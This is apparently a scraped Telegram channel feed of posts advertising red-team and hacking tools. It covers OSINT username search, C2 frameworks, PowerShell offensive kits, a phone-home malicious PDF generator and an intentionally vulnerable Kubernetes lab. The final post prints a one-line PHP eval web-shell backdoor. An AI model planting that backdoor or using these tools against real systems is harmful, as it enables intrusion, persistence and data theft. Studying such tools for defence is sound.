BugCod3
6.19K subscribers
308 photos
5 videos
7 files
406 links
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: t.iss.one/BugCod3GP
📂 Topic: t.iss.one/BugCod3Topic

🤖 Contact: t.iss.one/BugCod3BOT
📧 Email: [email protected]
Download Telegram
Hunt down social media accounts by username across social networks

😸 Github

⬇️ Installation
┌──(BugCod3㉿Arch)-[~]
└─$ git clone https://github.com/sherlock-project/sherlock.git

┌──(BugCod3㉿Arch)-[~]
└─$ cd sherlock

┌──(BugCod3㉿Arch)-[~]
└─$ python3 -m pip install -r requirements.txt

◀️ Usage
┌──(BugCod3㉿Arch)-[~]
└─$python3 sherlock --help

┌──(BugCod3㉿Arch)-[~]
└─$python3 sherlock user123

┌──(BugCod3㉿Arch)-[~]
└─$python3 sherlock user1 user2 user3

#Python #Sherlock #Redteam

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks.

⬇️ Download
🦊 GitHub

#Security #Network_Attacks #RedTeam #Tools

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Very useful tool for scanning the directories of a website

⬇️ Download
🦊 GitHub

#Security #Dirsearch #RedTeam #Tools

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
Villain 🦹‍♀️

Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells, enhance their functionality with additional features (commands, utilities etc) and share them among connected sibling servers (Villain instances running on different machines).

GitHub

#Python #RedTeam #CyberSecurity

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
👍1
Nishang

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

GitHub

#PowerShell #Penetration_Testing #RedTeam

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
RedTeam-Tools

This github repository contains a collection of 125+ tools and resources that can be useful for red teaming activities.

Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.

GitHub

BlueTeam-Tools

#RedTeam

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
❤‍🔥31
Kubernetes Goat

The Kubernetes Goat is designed to be an intentionally vulnerable cluster environment to learn and practice Kubernetes security 🚀

🏆 Scenarios
Sensitive keys in codebases
DIND (docker-in-docker) exploitation
SSRF in the Kubernetes (K8S) world
Container escape to the host system
Docker CIS benchmarks analysis
Kubernetes CIS benchmarks analysis
Attacking private registry
NodePort exposed services
Helm v2 tiller to PwN the cluster - [Deprecated]
Analyzing crypto miner container
MORE+++

GitHub

#RedTeam #Security #Vuln_App

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🔥1
Malicious PDF Generator ☠️

Generate ten different malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh

Usage

┌──(BugCod3㉿kali)-[~]
└─$
python3 malicious-pdf.py burp-collaborator-url

Output will be written as: test1.pdf, test2.pdf, test3.pdf etc in the current directory.

Purpose

⚪️ Test web pages/services accepting PDF-files
⚪️ Test security products
⚪️ Test PDF readers
⚪️ Test PDF converters

GitHub

#RedTeam #PDF #Pentesting

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🔥4
VIPER

⚪️ Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration
⚪️ Viper integrates basic functions such as bypass anti-virus software, intranet tunnel, file management, command line and so on
⚪️ Viper has integrated 80+ modules, covering Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection and other categories
⚪️ Viper's goal is to help red team engineers improve attack efficiency, simplify operation and reduce technical threshold
⚪️ Viper supports running native msfconsole in browser and multi - person collaboration

Site
Installation manual
GitHub

#RedTeam #Viper #Post_Exploitation

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
1🫡1
WinPwn

To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration.
The script is mostly based on well-known large other offensive security Powershell projects.

GitHub

#RedTeam #PowerShell #Pentesting

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🔥1
Full-featured C2 framework which silently persists on
webserver via polymorphic PHP oneliner

Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Features

Efficient:
More than 20 plugins to automate privilege-escalation tasks

Stealth: The framework is made by paranoids, for paranoids

Convenient: A robust interface with many crucial features

Supported platforms (as attacker):

GNU/Linux
Mac OS X

Supported platforms (as target):

GNU/Linux
BSD-like
Mac OS X
Windows NT

GitHub

#RedTeam #Web_Hacking #HackTool

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
🤯1